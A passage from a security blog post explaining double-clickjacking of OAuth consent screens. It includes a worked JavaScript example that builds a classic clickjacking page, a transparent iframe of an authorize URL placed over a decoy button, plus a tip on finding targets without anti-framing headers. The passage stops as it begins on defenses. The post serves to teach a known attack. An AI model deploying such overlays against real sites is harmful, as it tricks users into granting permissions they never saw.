Two Clicks to Chaos: How Double-clickjacking Hands Over Control of Apps without Users Knowing

In our last blog, we discussed how OAuth consent phishing tricks users into granting a malicious app permissions on an employee’s account, which the attacker then uses to act as that employee. The attack has been extremely effective because few users understand how OAuth permissions can be misused. Now suppose we are in an ideal world where, after ample security training, most employees are aware of consent phishing and scrupulously read every OAuth permission request. Would we then be immune to OAuth identity attacks?

Paulos Yibelo’s recent write-up on double-clickjacking suggests otherwise. The technique exploits the routine double-click: the attacker’s page swaps in the OAuth authorization screen for a split second between the first and second click, so the second click lands on the authorize button and grants the permission without the user ever seeing the prompt. The switch happens so quickly that even a vigilant user has no realistic chance of noticing what was authorized.

This article explores how double-clickjacking works, how it differs from traditional clickjacking, and the harder question: how do we stop something we cannot see happening?

A Trip Down Memory Lane: Revisiting Clickjacking

For those who have spent some time in security, clickjacking is likely a familiar term. Clickjacking is a technique that manipulates users into clicking on something other than what they perceive. Typical variants include loading the target page in a transparent iframe layered over a disguised decoy button, stacking iframe layers so the element the user sees is not the one that receives the click, and cursorjacking, where the attacker draws a fake cursor offset from the real one so that the real cursor’s position differs from what the user sees.
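To make the overlay variant concrete, here is an added example (not code from the original post or from Yibelo’s write-up) of how a classic clickjacking page is put together: a visible decoy button, and a fully transparent iframe of the target page offset so that the target’s real button sits exactly under the decoy. The target URL and all pixel positions below are constructed sample values, not measurements from any real site.

```javascript
// Added example, not from the original post. Constructs the classic
// clickjacking overlay: a decoy button with a transparent iframe of the
// target page laid over it so the target's real button is under the decoy.
// The URL and coordinates are made up for illustration.

// Compute the iframe offsets that put the target button under the decoy.
//   decoy:  where the visible decoy button sits on the attacker page (px).
//   target: where the real button sits inside the framed page (px).
// A negative offset shifts the frame up/left so the wanted region is the
// part of the frame that ends up over the decoy.
function alignOverlay(decoy, target) {
  return {
    left: decoy.left - target.left,
    top: decoy.top - target.top,
  };
}

// Build the attacker page as an HTML string. The iframe is transparent
// (opacity:0) but stacked above the decoy (z-index:2), so it still receives
// pointer events: a click on what looks like the decoy lands on the framed
// target button. This only works if the target page allows itself to be
// framed; the defenses the post covers next exist precisely to block this.
function buildClickjackPage(targetUrl, decoy, target) {
  const { left, top } = alignOverlay(decoy, target);
  return [
    '<!doctype html>',
    '<html><body>',
    `<button style="position:absolute; left:${decoy.left}px; top:${decoy.top}px; ` +
      `width:${decoy.width}px; height:${decoy.height}px; z-index:1;">Claim your prize</button>`,
    `<iframe src="${targetUrl}" style="position:absolute; left:${left}px; top:${top}px; ` +
      'width:1200px; height:900px; opacity:0; border:0; z-index:2;"></iframe>',
    '</body></html>',
  ].join('\n');
}

// Constructed sample values: decoy at (100,200), target's "Allow" button
// at (400,350) inside the framed page. The frame is shifted by (-300,-150).
const SAMPLE_DECOY = { left: 100, top: 200, width: 120, height: 40 };
const SAMPLE_TARGET = { left: 400, top: 350 };
const SAMPLE_URL = 'https://target.example/oauth/authorize?client_id=demo';

console.log(buildClickjackPage(SAMPLE_URL, SAMPLE_DECOY, SAMPLE_TARGET));
```

Run it with Node and save the output as an HTML file to see the layout; in a real test you would first confirm the target responds without anti-framing headers, since any modern target that forbids framing simply renders a blank frame and the overlay does nothing.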

How have we dealt with clickjacking?

From Facebook’s likejacking campaigns to Twitter’s fight against clickjackers, the early 2010s saw a slew of clickjacking attacks targeting major social media platforms and brands. Since then, clickjacking has largely been addressed in two ways: